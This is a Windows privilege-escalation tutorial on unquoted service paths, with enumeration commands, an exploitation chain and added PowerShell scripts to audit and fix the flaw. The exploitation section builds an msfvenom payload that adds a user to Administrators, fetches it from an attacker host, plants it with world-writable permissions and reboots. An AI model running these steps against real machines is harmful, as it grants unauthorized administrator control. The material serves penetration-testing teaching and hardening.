Windows PrivEsc with Unquoted Service Path

A Windows service whose binary path is unquoted and contains spaces may be vulnerable to privilege escalation: the service control manager tries each space-delimited prefix of the path as an executable before reaching the real binary, so a writable directory earlier in the path lets a low-privileged user plant a binary that runs with the service's privileges.

Investigation

On the target machine, find services with unquoted paths that start automatically and live outside C:\Windows.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v """

Also query the configuration of a single service (BINARY_PATH_NAME shows whether the path is quoted, and SERVICE_START_NAME shows which account it runs as).

sc qc "Development Service"

For instance, if the service path is C:\Program Files\Development Files\Devservice Files\Service.exe (unquoted), Windows tries C:\Program.exe, then C:\Program Files\Development.exe, then C:\Program Files\Development Files\Devservice.exe before the real binary, because everything after each space is treated as an argument. If C:\Program Files\Development Files\ is writable, we can place the exploit there as Devservice.exe.
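The following audit script, added here as an example and not part of the original page, automates the investigation step from a defender's side: it enumerates every service, keeps those whose ImagePath is unquoted and contains a space, expands the candidate paths Windows would try at each space, and flags whether the containing directory grants write access to broad principals. The .exe-suffix parsing and the ACL heuristic are assumptions of this example, not a full effective-permission calculation.

```powershell
# Added example (not from the original page): find services with unquoted, space-containing
# ImagePaths and list the intermediate binaries Windows would try before the real one.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }

        # A path that begins with a quote is already safe; skip it.
        if ($path.TrimStart().StartsWith('"')) { return }

        # Separate the executable from its arguments.
        # Assumption: the service binary ends in .exe (true for nearly all services).
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { return }
        $exe = $m.Groups[1].Value

        if ($exe -notmatch '\s') { return }        # no space: not affected by this issue
        if ($exe -like 'C:\Windows\*') { return }  # same filter as the page's wmic one-liner

        # At every space, Windows first tries <prefix>.exe; build that list of candidates.
        $candidates = @()
        $idx = $exe.IndexOf(' ')
        while ($idx -gt 0) {
            $candidates += ($exe.Substring(0, $idx) + '.exe')
            $idx = $exe.IndexOf(' ', $idx + 1)
        }

        foreach ($cand in $candidates) {
            $dir = Split-Path -Path $cand -Parent
            $dirExists = Test-Path -LiteralPath $dir
            $writable  = $false
            if ($dirExists) {
                # Heuristic: any Allow ACE giving Write/Modify/FullControl to a broad group.
                $acl = Get-Acl -LiteralPath $dir
                $writable = [bool]($acl.Access | Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $_.IdentityReference -match 'Everyone|Authenticated Users|BUILTIN\\Users|INTERACTIVE' -and
                    $_.FileSystemRights -match 'Write|Modify|FullControl'
                })
            }
            [pscustomobject]@{
                Service            = $svc.Name
                StartMode          = $svc.StartMode
                RunAs              = $svc.StartName
                ImagePath          = $path
                Candidate          = $cand
                DirExists          = $dirExists
                DirWritableByUsers = $writable
            }
        }
    }
}

# Usage: rows with StartMode Auto, RunAs LocalSystem and DirWritableByUsers True are the
# ones that matter; every other unquoted path is still worth quoting (see Exploitation).
Get-UnquotedServicePath | Sort-Object Service, Candidate | Format-Table -AutoSize
```

The script reports a candidate for every space in the path, not just the first one, because a deeper directory (for example a vendor's own folder under Program Files) is more likely to be writable than C:\ itself.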


Exploitation

1. Create a Payload

On the local machine, create a payload using msfvenom.
Replace "victim-user" with the low-privileged user account we already control on the target.

msfvenom -p windows/exec CMD='net localgroup Administrators victim-user /add' -f exe-service -o Devservice.exe

2. Place a Payload to Target Path

Now transfer the payload to target machine.

Invoke-WebRequest -Uri http://<local-ip>:8000/Devservice.exe -OutFile .\Devservice.exe

Then move the payload to the directory identified during the investigation, using the file name Windows will try first at that level (here, Devservice.exe).

mv .\Devservice.exe 'C:\Program Files\Development Files\Devservice.exe'

3. Change Permission of the Payload

icacls 'C:\Program Files\Development Files\Devservice.exe' /grant Everyone:F

4. Restart Machine

Restart the target machine so the automatic service starts again. The service control manager runs the planted Devservice.exe as the service account (typically LocalSystem), and the payload adds the victim user to the local Administrators group.

# Restart
shutdown /r /t 0
# or PowerShell's command
Restart-Computer
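The fix for this whole chain is to quote the service's ImagePath and make sure the directories along it are not writable by non-administrators. The function below is an added example and not part of the original page; it reads the service's ImagePath from the registry, wraps the executable part in quotes while preserving any arguments, and returns the corrected value so it can be verified with sc qc. "Development Service" is the service name used on this page; the .exe-suffix parsing is an assumption of the example.

```powershell
# Added example (not from the original page): quote an unquoted service ImagePath.
# Must run elevated, since it writes under HKLM:\SYSTEM.
function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$ServiceName)

    $key     = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $current = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath

    # Already quoted: nothing to do.
    if ($current.TrimStart().StartsWith('"')) { return $current }

    # Split executable from arguments (assumption: the binary ends in .exe).
    $m = [regex]::Match($current, '^(.*?\.exe)(.*)$', 'IgnoreCase')
    if (-not $m.Success) { throw "Cannot parse ImagePath for ${ServiceName}: $current" }

    $fixed = '"' + $m.Groups[1].Value + '"' + $m.Groups[2].Value
    if ($PSCmdlet.ShouldProcess($ServiceName, "Set ImagePath to $fixed")) {
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
    }
    return $fixed
}

# Usage: fix the service from this page, then confirm the change is visible to the SCM.
Repair-UnquotedServicePath -ServiceName 'Development Service' -WhatIf   # preview only
Repair-UnquotedServicePath -ServiceName 'Development Service'
sc.exe qc "Development Service"

# Also remove the broad write grant that step 3 of the Exploitation section relies on.
# Assumption: this directory should be writable by Administrators only.
icacls "C:\Program Files\Development Files" /remove:g Everyone /remove:g "BUILTIN\Users"
```

Quoting the path alone stops the search for intermediate binaries; tightening the directory ACL removes the write primitive itself, and both are worth doing because a vendor update may reinstall the unquoted path later.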